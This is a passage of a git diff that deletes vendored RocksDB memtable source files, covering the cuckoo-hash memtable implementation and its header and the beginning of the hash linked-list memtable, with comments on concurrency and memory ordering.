-  }
-};
-
-void HashCuckooRep::Get(const LookupKey& key, void* callback_args,
-                        bool (*callback_func)(void* arg, const char* entry)) {
-  Slice user_key = key.user_key();
-  for (unsigned int hid = 0; hid < hash_function_count_; ++hid) {
-    const char* bucket =
-        cuckoo_array_[GetHash(user_key, hid)].load(std::memory_order_acquire);
-    if (bucket != nullptr) {
-      Slice bucket_user_key = UserKey(bucket);
-      if (user_key == bucket_user_key) {
-        callback_func(callback_args, bucket);
-        break;
-      }
-    } else {
-      // as Put() always stores at the vacant bucket located by the
-      // hash function with the smallest possible id, when we first
-      // find a vacant bucket in Get(), that means a miss.
-      break;
-    }
-  }
-  MemTableRep* backup_table = backup_table_.get();
-  if (backup_table != nullptr) {
-    backup_table->Get(key, callback_args, callback_func);
-  }
-}
-
-void HashCuckooRep::Insert(KeyHandle handle) {
-  static const float kMaxFullness = 0.90f;
-
-  auto* key = static_cast<char*>(handle);
-  int initial_hash_id = 0;
-  size_t cuckoo_path_length = 0;
-  auto user_key = UserKey(key);
-  // find cuckoo path
-  if (FindCuckooPath(key, user_key, cuckoo_path_, &cuckoo_path_length,
-                     initial_hash_id) == false) {
-    // if true, then we can't find a vacant bucket for this key even we
-    // have used up all the hash functions.  Then use a backup memtable to
-    // store such key, which will further make this mem-table become
-    // immutable.
-    if (backup_table_.get() == nullptr) {
-      VectorRepFactory factory(10);
-      backup_table_.reset(
-          factory.CreateMemTableRep(compare_, allocator_, nullptr, nullptr));
-      is_nearly_full_ = true;
-    }
-    backup_table_->Insert(key);
-    return;
-  }
-  // when reaching this point, means the insert can be done successfully.
-  occupied_count_++;
-  if (occupied_count_ >= bucket_count_ * kMaxFullness) {
-    is_nearly_full_ = true;
-  }
-
-  // perform kickout process if the length of cuckoo path > 1.
-  if (cuckoo_path_length == 0) return;
-
-  // the cuckoo path stores the kickout path in reverse order.
-  // so the kickout or displacement is actually performed
-  // in reverse order, which avoids false-negatives on read
-  // by moving each key involved in the cuckoo path to the new
-  // location before replacing it.
-  for (size_t i = 1; i < cuckoo_path_length; ++i) {
-    int kicked_out_bid = cuckoo_path_[i - 1];
-    int current_bid = cuckoo_path_[i];
-    // since we only allow one writer at a time, it is safe to do relaxed read.
-    cuckoo_array_[kicked_out_bid]
-        .store(cuckoo_array_[current_bid].load(std::memory_order_relaxed),
-               std::memory_order_release);
-  }
-  int insert_key_bid = cuckoo_path_[cuckoo_path_length - 1];
-  cuckoo_array_[insert_key_bid].store(key, std::memory_order_release);
-}
-
-bool HashCuckooRep::Contains(const char* internal_key) const {
-  auto user_key = UserKey(internal_key);
-  for (unsigned int hid = 0; hid < hash_function_count_; ++hid) {
-    const char* stored_key =
-        cuckoo_array_[GetHash(user_key, hid)].load(std::memory_order_acquire);
-    if (stored_key != nullptr) {
-      if (compare_(internal_key, stored_key) == 0) {
-        return true;
-      }
-    }
-  }
-  return false;
-}
-
-bool HashCuckooRep::QuickInsert(const char* internal_key, const Slice& user_key,
-                                int bucket_ids[], const int initial_hash_id) {
-  int cuckoo_bucket_id = -1;
-
-  // Below does the followings:
-  // 0. Calculate all possible locations of the input key.
-  // 1. Check if there is a bucket having same user_key as the input does.
-  // 2. If there exists such bucket, then replace this bucket by the newly
-  //    insert data and return.  This step also performs duplication check.
-  // 3. If no such bucket exists but exists a vacant bucket, then insert the
-  //    input data into it.
-  // 4. If step 1 to 3 all fail, then return false.
-  for (unsigned int hid = initial_hash_id; hid < hash_function_count_; ++hid) {
-    bucket_ids[hid] = GetHash(user_key, hid);
-    // since only one PUT is allowed at a time, and this is part of the PUT
-    // operation, so we can safely perform relaxed load.
-    const char* stored_key =
-        cuckoo_array_[bucket_ids[hid]].load(std::memory_order_relaxed);
-    if (stored_key == nullptr) {
-      if (cuckoo_bucket_id == -1) {
-        cuckoo_bucket_id = bucket_ids[hid];
-      }
-    } else {
-      const auto bucket_user_key = UserKey(stored_key);
-      if (bucket_user_key.compare(user_key) == 0) {
-        cuckoo_bucket_id = bucket_ids[hid];
-        break;
-      }
-    }
-  }
-
-  if (cuckoo_bucket_id != -1) {
-    cuckoo_array_[cuckoo_bucket_id].store(const_cast<char*>(internal_key),
-                                          std::memory_order_release);
-    return true;
-  }
-
-  return false;
-}
-
-// Perform pre-check and find the shortest cuckoo path.  A cuckoo path
-// is a displacement sequence for inserting the specified input key.
-//
-// @return true if it successfully found a vacant space or cuckoo-path.
-//     If the return value is true but the length of cuckoo_path is zero,
-//     then it indicates that a vacant bucket or an bucket with matched user
-//     key with the input is found, and a quick insertion is done.
-bool HashCuckooRep::FindCuckooPath(const char* internal_key,
-                                   const Slice& user_key, int* cuckoo_path,
-                                   size_t* cuckoo_path_length,
-                                   const int initial_hash_id) {
-  int bucket_ids[HashCuckooRepFactory::kMaxHashCount];
-  *cuckoo_path_length = 0;
-
-  if (QuickInsert(internal_key, user_key, bucket_ids, initial_hash_id)) {
-    return true;
-  }
-  // If this step is reached, then it means:
-  // 1. no vacant bucket in any of the possible locations of the input key.
-  // 2. none of the possible locations of the input key has the same user
-  //    key as the input `internal_key`.
-
-  // the front and back indices for the step_queue_
-  step_buffer_.reset();
-
-  for (unsigned int hid = initial_hash_id; hid < hash_function_count_; ++hid) {
-    /// CuckooStep& current_step = step_queue_[front_pos++];
-    CuckooStep& current_step = step_buffer_.NextWriteBuffer();
-    current_step.bucket_id_ = bucket_ids[hid];
-    current_step.prev_step_id_ = CuckooStep::kNullStep;
-    current_step.depth_ = 1;
-  }
-
-  while (step_buffer_.HasNewWrite()) {
-    int step_id = step_buffer_.read_index_;
-    const CuckooStep& step = step_buffer_.ReadNext();
-    // Since it's a BFS process, then the first step with its depth deeper
-    // than the maximum allowed depth indicates all the remaining steps
-    // in the step buffer queue will all exceed the maximum depth.
-    // Return false immediately indicating we can't find a vacant bucket
-    // for the input key before the maximum allowed depth.
-    if (step.depth_ >= cuckoo_path_max_depth_) {
-      return false;
-    }
-    // again, we can perform no barrier load safely here as the current
-    // thread is the only writer.
-    Slice bucket_user_key =
-        UserKey(cuckoo_array_[step.bucket_id_].load(std::memory_order_relaxed));
-    if (step.prev_step_id_ != CuckooStep::kNullStep) {
-      if (bucket_user_key == user_key) {
-        // then there is a loop in the current path, stop discovering this path.
-        continue;
-      }
-    }
-    // if the current bucket stores at its nth location, then we only consider
-    // its mth location where m > n.  This property makes sure that all reads
-    // will not miss if we do have data associated to the query key.
-    //
-    // The n and m in the above statement is the start_hid and hid in the code.
-    unsigned int start_hid = hash_function_count_;
-    for (unsigned int hid = 0; hid < hash_function_count_; ++hid) {
-      bucket_ids[hid] = GetHash(bucket_user_key, hid);
-      if (step.bucket_id_ == bucket_ids[hid]) {
-        start_hid = hid;
-      }
-    }
-    // must found a bucket which is its current "home".
-    assert(start_hid != hash_function_count_);
-
-    // explore all possible next steps from the current step.
-    for (unsigned int hid = start_hid + 1; hid < hash_function_count_; ++hid) {
-      CuckooStep& next_step = step_buffer_.NextWriteBuffer();
-      next_step.bucket_id_ = bucket_ids[hid];
-      next_step.prev_step_id_ = step_id;
-      next_step.depth_ = step.depth_ + 1;
-      // once a vacant bucket is found, trace back all its previous steps
-      // to generate a cuckoo path.
-      if (cuckoo_array_[next_step.bucket_id_].load(std::memory_order_relaxed) ==
-          nullptr) {
-        // store the last step in the cuckoo path.  Note that cuckoo_path
-        // stores steps in reverse order.  This allows us to move keys along
-        // the cuckoo path by storing each key to the new place first before
-        // removing it from the old place.  This property ensures reads will
-        // not missed due to moving keys along the cuckoo path.
-        cuckoo_path[(*cuckoo_path_length)++] = next_step.bucket_id_;
-        int depth;
-        for (depth = step.depth_; depth > 0 && step_id != CuckooStep::kNullStep;
-             depth--) {
-          const CuckooStep& prev_step = step_buffer_.steps_[step_id];
-          cuckoo_path[(*cuckoo_path_length)++] = prev_step.bucket_id_;
-          step_id = prev_step.prev_step_id_;
-        }
-        assert(depth == 0 && step_id == CuckooStep::kNullStep);
-        return true;
-      }
-      if (step_buffer_.IsFull()) {
-        // if true, then it reaches maxinum number of cuckoo search steps.
-        return false;
-      }
-    }
-  }
-
-  // tried all possible paths but still not unable to find a cuckoo path
-  // which path leads to a vacant bucket.
-  return false;
-}
-
-HashCuckooRep::Iterator::Iterator(
-    std::shared_ptr<std::vector<const char*>> bucket,
-    const KeyComparator& compare)
-    : bucket_(bucket),
-      cit_(bucket_->end()),
-      compare_(compare),
-      sorted_(false) {}
-
-void HashCuckooRep::Iterator::DoSort() const {
-  if (!sorted_) {
-    std::sort(bucket_->begin(), bucket_->end(),
-              stl_wrappers::Compare(compare_));
-    cit_ = bucket_->begin();
-    sorted_ = true;
-  }
-}
-
-// Returns true iff the iterator is positioned at a valid node.
-bool HashCuckooRep::Iterator::Valid() const {
-  DoSort();
-  return cit_ != bucket_->end();
-}
-
-// Returns the key at the current position.
-// REQUIRES: Valid()
-const char* HashCuckooRep::Iterator::key() const {
-  assert(Valid());
-  return *cit_;
-}
-
-// Advances to the next position.
-// REQUIRES: Valid()
-void HashCuckooRep::Iterator::Next() {
-  assert(Valid());
-  if (cit_ == bucket_->end()) {
-    return;
-  }
-  ++cit_;
-}
-
-// Advances to the previous position.
-// REQUIRES: Valid()
-void HashCuckooRep::Iterator::Prev() {
-  assert(Valid());
-  if (cit_ == bucket_->begin()) {
-    // If you try to go back from the first element, the iterator should be
-    // invalidated. So we set it to past-the-end. This means that you can
-    // treat the container circularly.
-    cit_ = bucket_->end();
-  } else {
-    --cit_;
-  }
-}
-
-// Advance to the first entry with a key >= target
-void HashCuckooRep::Iterator::Seek(const Slice& user_key,
-                                   const char* memtable_key) {
-  DoSort();
-  // Do binary search to find first value not less than the target
-  const char* encoded_key =
-      (memtable_key != nullptr) ? memtable_key : EncodeKey(&tmp_, user_key);
-  cit_ = std::equal_range(bucket_->begin(), bucket_->end(), encoded_key,
-                          [this](const char* a, const char* b) {
-                            return compare_(a, b) < 0;
-                          }).first;
-}
-
-// Retreat to the last entry with a key <= target
-void HashCuckooRep::Iterator::SeekForPrev(const Slice& user_key,
-                                          const char* memtable_key) {
-  assert(false);
-}
-
-// Position at the first entry in collection.
-// Final state of iterator is Valid() iff collection is not empty.
-void HashCuckooRep::Iterator::SeekToFirst() {
-  DoSort();
-  cit_ = bucket_->begin();
-}
-
-// Position at the last entry in collection.
-// Final state of iterator is Valid() iff collection is not empty.
-void HashCuckooRep::Iterator::SeekToLast() {
-  DoSort();
-  cit_ = bucket_->end();
-  if (bucket_->size() != 0) {
-    --cit_;
-  }
-}
-
-}  // anom namespace
-
-MemTableRep* HashCuckooRepFactory::CreateMemTableRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform* transform, Logger* logger) {
-  // The estimated average fullness.  The write performance of any close hash
-  // degrades as the fullness of the mem-table increases.  Setting kFullness
-  // to a value around 0.7 can better avoid write performance degradation while
-  // keeping efficient memory usage.
-  static const float kFullness = 0.7f;
-  size_t pointer_size = sizeof(std::atomic<const char*>);
-  assert(write_buffer_size_ >= (average_data_size_ + pointer_size));
-  size_t bucket_count =
-    static_cast<size_t>(
-      (write_buffer_size_ / (average_data_size_ + pointer_size)) / kFullness +
-      1);
-  unsigned int hash_function_count = hash_function_count_;
-  if (hash_function_count < 2) {
-    hash_function_count = 2;
-  }
-  if (hash_function_count > kMaxHashCount) {
-    hash_function_count = kMaxHashCount;
-  }
-  return new HashCuckooRep(compare, allocator, bucket_count,
-                           hash_function_count,
-                           static_cast<size_t>(
-                             (average_data_size_ + pointer_size) / kFullness)
-                           );
-}
-
-MemTableRepFactory* NewHashCuckooRepFactory(size_t write_buffer_size,
-                                            size_t average_data_size,
-                                            unsigned int hash_function_count) {
-  return new HashCuckooRepFactory(write_buffer_size, average_data_size,
-                                  hash_function_count);
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/hash_cuckoo_rep.h b/thirdparty/rocksdb/memtable/hash_cuckoo_rep.h
deleted file mode 100644
index 800696e..0000000
--- a/thirdparty/rocksdb/memtable/hash_cuckoo_rep.h
+++ /dev/null
@@ -1,44 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include "port/port.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/memtablerep.h"
-
-namespace rocksdb {
-
-class HashCuckooRepFactory : public MemTableRepFactory {
- public:
-  // maxinum number of hash functions used in the cuckoo hash.
-  static const unsigned int kMaxHashCount = 10;
-
-  explicit HashCuckooRepFactory(size_t write_buffer_size,
-                                size_t average_data_size,
-                                unsigned int hash_function_count)
-      : write_buffer_size_(write_buffer_size),
-        average_data_size_(average_data_size),
-        hash_function_count_(hash_function_count) {}
-
-  virtual ~HashCuckooRepFactory() {}
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(
-      const MemTableRep::KeyComparator& compare, Allocator* allocator,
-      const SliceTransform* transform, Logger* logger) override;
-
-  virtual const char* Name() const override { return "HashCuckooRepFactory"; }
-
- private:
-  size_t write_buffer_size_;
-  size_t average_data_size_;
-  const unsigned int hash_function_count_;
-};
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/hash_linklist_rep.cc b/thirdparty/rocksdb/memtable/hash_linklist_rep.cc
deleted file mode 100644
index 932b62a..0000000
--- a/thirdparty/rocksdb/memtable/hash_linklist_rep.cc
+++ /dev/null
@@ -1,847 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-#include "memtable/hash_linklist_rep.h"
-
-#include <algorithm>
-#include <atomic>
-#include "db/memtable.h"
-#include "memtable/skiplist.h"
-#include "monitoring/histogram.h"
-#include "port/port.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "util/arena.h"
-#include "util/murmurhash.h"
-
-namespace rocksdb {
-namespace {
-
-typedef const char* Key;
-typedef SkipList<Key, const MemTableRep::KeyComparator&> MemtableSkipList;
-typedef std::atomic<void*> Pointer;
-
-// A data structure used as the header of a link list of a hash bucket.
-struct BucketHeader {
-  Pointer next;
-  std::atomic<uint32_t> num_entries;
-
-  explicit BucketHeader(void* n, uint32_t count)
-      : next(n), num_entries(count) {}
-
-  bool IsSkipListBucket() {
-    return next.load(std::memory_order_relaxed) == this;
-  }
-
-  uint32_t GetNumEntries() const {
-    return num_entries.load(std::memory_order_relaxed);
-  }
-
-  // REQUIRES: called from single-threaded Insert()
-  void IncNumEntries() {
-    // Only one thread can do write at one time. No need to do atomic
-    // incremental. Update it with relaxed load and store.
-    num_entries.store(GetNumEntries() + 1, std::memory_order_relaxed);
-  }
-};
-
-// A data structure used as the header of a skip list of a hash bucket.
-struct SkipListBucketHeader {
-  BucketHeader Counting_header;
-  MemtableSkipList skip_list;
-
-  explicit SkipListBucketHeader(const MemTableRep::KeyComparator& cmp,
-                                Allocator* allocator, uint32_t count)
-      : Counting_header(this,  // Pointing to itself to indicate header type.
-                        count),
-        skip_list(cmp, allocator) {}
-};
-
-struct Node {
-  // Accessors/mutators for links.  Wrapped in methods so we can
-  // add the appropriate barriers as necessary.
-  Node* Next() {
-    // Use an 'acquire load' so that we observe a fully initialized
-    // version of the returned Node.
-    return next_.load(std::memory_order_acquire);
-  }
-  void SetNext(Node* x) {
-    // Use a 'release store' so that anybody who reads through this
-    // pointer observes a fully initialized version of the inserted node.
-    next_.store(x, std::memory_order_release);
-  }
-  // No-barrier variants that can be safely used in a few locations.
-  Node* NoBarrier_Next() {
-    return next_.load(std::memory_order_relaxed);
-  }
-
-  void NoBarrier_SetNext(Node* x) { next_.store(x, std::memory_order_relaxed); }
-
-  // Needed for placement new below which is fine
-  Node() {}
-
- private:
-  std::atomic<Node*> next_;
-
-  // Prohibit copying due to the below
-  Node(const Node&) = delete;
-  Node& operator=(const Node&) = delete;
-
- public:
-  char key[1];
-};
-
-// Memory structure of the mem table:
-// It is a hash table, each bucket points to one entry, a linked list or a
-// skip list. In order to track total number of records in a bucket to determine
-// whether should switch to skip list, a header is added just to indicate
-// number of entries in the bucket.
-//
-//
-//          +-----> NULL    Case 1. Empty bucket
-//          |
-//          |
-//          | +---> +-------+
-//          | |     | Next  +--> NULL
-//          | |     +-------+
-//  +-----+ | |     |       |  Case 2. One Entry in bucket.
-//  |     +-+ |     | Data  |          next pointer points to
-//  +-----+   |     |       |          NULL. All other cases
-//  |     |   |     |       |          next pointer is not NULL.
-//  +-----+   |     +-------+
-//  |     +---+
-//  +-----+     +-> +-------+  +> +-------+  +-> +-------+
-//  |     |     |   | Next  +--+  | Next  +--+   | Next  +-->NULL
-//  +-----+     |   +-------+     +-------+      +-------+
-//  |     +-----+   | Count |     |       |      |       |
-//  +-----+         +-------+     | Data  |      | Data  |
-//  |     |                       |       |      |       |
-//  +-----+          Case 3.      |       |      |       |
-//  |     |          A header     +-------+      +-------+
-//  +-----+          points to
-//  |     |          a linked list. Count indicates total number
-//  +-----+          of rows in this bucket.
-//  |     |
-//  +-----+    +-> +-------+ <--+
-//  |     |    |   | Next  +----+
-//  +-----+    |   +-------+   Case 4. A header points to a skip
-//  |     +----+   | Count |           list and next pointer points to
-//  +-----+        +-------+           itself, to distinguish case 3 or 4.
-//  |     |        |       |           Count still is kept to indicates total
-//  +-----+        | Skip +-->         of entries in the bucket for debugging
-//  |     |        | List  |   Data    purpose.
-//  |     |        |      +-->
-//  +-----+        |       |
-//  |     |        +-------+
-//  +-----+
-//
-// We don't have data race when changing cases because:
-// (1) When changing from case 2->3, we create a new bucket header, put the
-//     single node there first without changing the original node, and do a
-//     release store when changing the bucket pointer. In that case, a reader
-//     who sees a stale value of the bucket pointer will read this node, while
-//     a reader sees the correct value because of the release store.
-// (2) When changing case 3->4, a new header is created with skip list points
-//     to the data, before doing an acquire store to change the bucket pointer.
-//     The old header and nodes are never changed, so any reader sees any
-//     of those existing pointers will guarantee to be able to iterate to the
-//     end of the linked list.
-// (3) Header's next pointer in case 3 might change, but they are never equal
-//     to itself, so no matter a reader sees any stale or newer value, it will
-//     be able to correctly distinguish case 3 and 4.
-//
-// The reason that we use case 2 is we want to make the format to be efficient
-// when the utilization of buckets is relatively low. If we use case 3 for
-// single entry bucket, we will need to waste 12 bytes for every entry,
-// which can be significant decrease of memory utilization.
-class HashLinkListRep : public MemTableRep {
- public:
-  HashLinkListRep(const MemTableRep::KeyComparator& compare,
-                  Allocator* allocator, const SliceTransform* transform,
-                  size_t bucket_size, uint32_t threshold_use_skiplist,
-                  size_t huge_page_tlb_size, Logger* logger,
-                  int bucket_entries_logging_threshold,
-                  bool if_log_bucket_dist_when_flash);
-
-  virtual KeyHandle Allocate(const size_t len, char** buf) override;
-
-  virtual void Insert(KeyHandle handle) override;
-
-  virtual bool Contains(const char* key) const override;
-
-  virtual size_t ApproximateMemoryUsage() override;
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override;
-
-  virtual ~HashLinkListRep();
-
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena = nullptr) override;
-
-  virtual MemTableRep::Iterator* GetDynamicPrefixIterator(
-       Arena* arena = nullptr) override;
-
- private:
-  friend class DynamicIterator;
-
-  size_t bucket_size_;
-
-  // Maps slices (which are transformed user keys) to buckets of keys sharing
-  // the same transform.
-  Pointer* buckets_;
-
-  const uint32_t threshold_use_skiplist_;
-
-  // The user-supplied transform whose domain is the user keys.
-  const SliceTransform* transform_;
-
-  const MemTableRep::KeyComparator& compare_;
-
-  Logger* logger_;
-  int bucket_entries_logging_threshold_;
-  bool if_log_bucket_dist_when_flash_;
-
-  bool LinkListContains(Node* head, const Slice& key) const;
-
-  SkipListBucketHeader* GetSkipListBucketHeader(Pointer* first_next_pointer)
-      const;
-
-  Node* GetLinkListFirstNode(Pointer* first_next_pointer) const;
-
-  Slice GetPrefix(const Slice& internal_key) const {
-    return transform_->Transform(ExtractUserKey(internal_key));
-  }
-
-  size_t GetHash(const Slice& slice) const {
-    return MurmurHash(slice.data(), static_cast<int>(slice.size()), 0) %
-           bucket_size_;
-  }
-
-  Pointer* GetBucket(size_t i) const {
-    return static_cast<Pointer*>(buckets_[i].load(std::memory_order_acquire));
-  }
-
-  Pointer* GetBucket(const Slice& slice) const {
-    return GetBucket(GetHash(slice));
-  }
-
-  bool Equal(const Slice& a, const Key& b) const {
-    return (compare_(b, a) == 0);
-  }
-
-  bool Equal(const Key& a, const Key& b) const { return (compare_(a, b) == 0); }
-
-  bool KeyIsAfterNode(const Slice& internal_key, const Node* n) const {
-    // nullptr n is considered infinite
-    return (n != nullptr) && (compare_(n->key, internal_key) < 0);
-  }
-
-  bool KeyIsAfterNode(const Key& key, const Node* n) const {
-    // nullptr n is considered infinite
-    return (n != nullptr) && (compare_(n->key, key) < 0);
-  }
-
-  bool KeyIsAfterOrAtNode(const Slice& internal_key, const Node* n) const {
-    // nullptr n is considered infinite
-    return (n != nullptr) && (compare_(n->key, internal_key) <= 0);
-  }
-
-  bool KeyIsAfterOrAtNode(const Key& key, const Node* n) const {
-    // nullptr n is considered infinite
-    return (n != nullptr) && (compare_(n->key, key) <= 0);
-  }
-
-  Node* FindGreaterOrEqualInBucket(Node* head, const Slice& key) const;
-  Node* FindLessOrEqualInBucket(Node* head, const Slice& key) const;
-
-  class FullListIterator : public MemTableRep::Iterator {
-   public:
-    explicit FullListIterator(MemtableSkipList* list, Allocator* allocator)
-        : iter_(list), full_list_(list), allocator_(allocator) {}
-
-    virtual ~FullListIterator() {
-    }
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override { return iter_.Valid(); }
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override {
-      assert(Valid());
-      return iter_.key();
-    }
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override {
-      assert(Valid());
-      iter_.Next();
-    }
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override {
-      assert(Valid());
-      iter_.Prev();
-    }
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& internal_key,
-                      const char* memtable_key) override {
-      const char* encoded_key =
-          (memtable_key != nullptr) ?
-              memtable_key : EncodeKey(&tmp_, internal_key);
-      iter_.Seek(encoded_key);
-    }
-
-    // Retreat to the last entry with a key <= target
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) override {
-      const char* encoded_key = (memtable_key != nullptr)
-                                    ? memtable_key
-                                    : EncodeKey(&tmp_, internal_key);
-      iter_.SeekForPrev(encoded_key);
-    }
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override { iter_.SeekToFirst(); }
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override { iter_.SeekToLast(); }
-   private:
-    MemtableSkipList::Iterator iter_;
-    // To destruct with the iterator.
-    std::unique_ptr<MemtableSkipList> full_list_;
-    std::unique_ptr<Allocator> allocator_;
-    std::string tmp_;       // For passing to EncodeKey
-  };
-
-  class LinkListIterator : public MemTableRep::Iterator {
-   public:
-    explicit LinkListIterator(const HashLinkListRep* const hash_link_list_rep,
-                              Node* head)
-        : hash_link_list_rep_(hash_link_list_rep),
-          head_(head),
-          node_(nullptr) {}
-
-    virtual ~LinkListIterator() {}
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override { return node_ != nullptr; }
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override {
-      assert(Valid());
-      return node_->key;
-    }
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override {
-      assert(Valid());
-      node_ = node_->Next();
-    }
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override {
-      // Prefix iterator does not support total order.
-      // We simply set the iterator to invalid state
-      Reset(nullptr);
-    }
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& internal_key,
-                      const char* memtable_key) override {
-      node_ = hash_link_list_rep_->FindGreaterOrEqualInBucket(head_,
-                                                              internal_key);
-    }
-
-    // Retreat to the last entry with a key <= target
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) override {
-      // Since we do not support Prev()
-      // We simply do not support SeekForPrev
-      Reset(nullptr);
-    }
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override {
-      // Prefix iterator does not support total order.
-      // We simply set the iterator to invalid state
-      Reset(nullptr);
-    }
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override {
-      // Prefix iterator does not support total order.
-      // We simply set the iterator to invalid state
-      Reset(nullptr);
-    }
-
-   protected:
-    void Reset(Node* head) {
-      head_ = head;
-      node_ = nullptr;
-    }
-   private:
-    friend class HashLinkListRep;
-    const HashLinkListRep* const hash_link_list_rep_;
-    Node* head_;
-    Node* node_;
-
-    virtual void SeekToHead() {
-      node_ = head_;
-    }
-  };
-
-  class DynamicIterator : public HashLinkListRep::LinkListIterator {
-   public:
-    explicit DynamicIterator(HashLinkListRep& memtable_rep)
-        : HashLinkListRep::LinkListIterator(&memtable_rep, nullptr),
-          memtable_rep_(memtable_rep) {}
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& k, const char* memtable_key) override {
-      auto transformed = memtable_rep_.GetPrefix(k);
-      auto* bucket = memtable_rep_.GetBucket(transformed);
-
-      SkipListBucketHeader* skip_list_header =
-          memtable_rep_.GetSkipListBucketHeader(bucket);
-      if (skip_list_header != nullptr) {
-        // The bucket is organized as a skip list
-        if (!skip_list_iter_) {
-          skip_list_iter_.reset(
-              new MemtableSkipList::Iterator(&skip_list_header->skip_list));
-        } else {
-          skip_list_iter_->SetList(&skip_list_header->skip_list);
-        }
-        if (memtable_key != nullptr) {
-          skip_list_iter_->Seek(memtable_key);
-        } else {
-          IterKey encoded_key;
-          encoded_key.EncodeLengthPrefixedKey(k);
-          skip_list_iter_->Seek(encoded_key.GetUserKey().data());
-        }
-      } else {
-        // The bucket is organized as a linked list
-        skip_list_iter_.reset();
-        Reset(memtable_rep_.GetLinkListFirstNode(bucket));
-        HashLinkListRep::LinkListIterator::Seek(k, memtable_key);
-      }
-    }
-
-    virtual bool Valid() const override {
-      if (skip_list_iter_) {
-        return skip_list_iter_->Valid();
-      }
-      return HashLinkListRep::LinkListIterator::Valid();
-    }
-
-    virtual const char* key() const override {
-      if (skip_list_iter_) {
-        return skip_list_iter_->key();
-      }
-      return HashLinkListRep::LinkListIterator::key();
-    }
-
-    virtual void Next() override {
-      if (skip_list_iter_) {
-        skip_list_iter_->Next();
-      } else {
-        HashLinkListRep::LinkListIterator::Next();
-      }
-    }
-
-   private:
-    // the underlying memtable
-    const HashLinkListRep& memtable_rep_;
-    std::unique_ptr<MemtableSkipList::Iterator> skip_list_iter_;
-  };
-
-  class EmptyIterator : public MemTableRep::Iterator {
-    // This is used when there wasn't a bucket. It is cheaper than
-    // instantiating an empty bucket over which to iterate.
-   public:
-    EmptyIterator() { }
-    virtual bool Valid() const override { return false; }
-    virtual const char* key() const override {
-      assert(false);
-      return nullptr;
-    }
-    virtual void Next() override {}
-    virtual void Prev() override {}
-    virtual void Seek(const Slice& user_key,
-                      const char* memtable_key) override {}
-    virtual void SeekForPrev(const Slice& user_key,
-                             const char* memtable_key) override {}
-    virtual void SeekToFirst() override {}
-    virtual void SeekToLast() override {}
-
-   private:
-  };
-};
-
-HashLinkListRep::HashLinkListRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform* transform, size_t bucket_size,
-    uint32_t threshold_use_skiplist, size_t huge_page_tlb_size, Logger* logger,
-    int bucket_entries_logging_threshold, bool if_log_bucket_dist_when_flash)
-    : MemTableRep(allocator),
-      bucket_size_(bucket_size),
-      // Threshold to use skip list doesn't make sense if less than 3, so we
-      // force it to be minimum of 3 to simplify implementation.
-      threshold_use_skiplist_(std::max(threshold_use_skiplist, 3U)),
-      transform_(transform),
-      compare_(compare),
-      logger_(logger),
-      bucket_entries_logging_threshold_(bucket_entries_logging_threshold),
-      if_log_bucket_dist_when_flash_(if_log_bucket_dist_when_flash) {
-  char* mem = allocator_->AllocateAligned(sizeof(Pointer) * bucket_size,
-                                      huge_page_tlb_size, logger);
-
-  buckets_ = new (mem) Pointer[bucket_size];
-
-  for (size_t i = 0; i < bucket_size_; ++i) {
-    buckets_[i].store(nullptr, std::memory_order_relaxed);
-  }
-}
-
-HashLinkListRep::~HashLinkListRep() {
-}
-
-KeyHandle HashLinkListRep::Allocate(const size_t len, char** buf) {
-  char* mem = allocator_->AllocateAligned(sizeof(Node) + len);
-  Node* x = new (mem) Node();
-  *buf = x->key;
-  return static_cast<void*>(x);
-}
-
-SkipListBucketHeader* HashLinkListRep::GetSkipListBucketHeader(
-    Pointer* first_next_pointer) const {
-  if (first_next_pointer == nullptr) {
-    return nullptr;
-  }
-  if (first_next_pointer->load(std::memory_order_relaxed) == nullptr) {
-    // Single entry bucket
-    return nullptr;
-  }
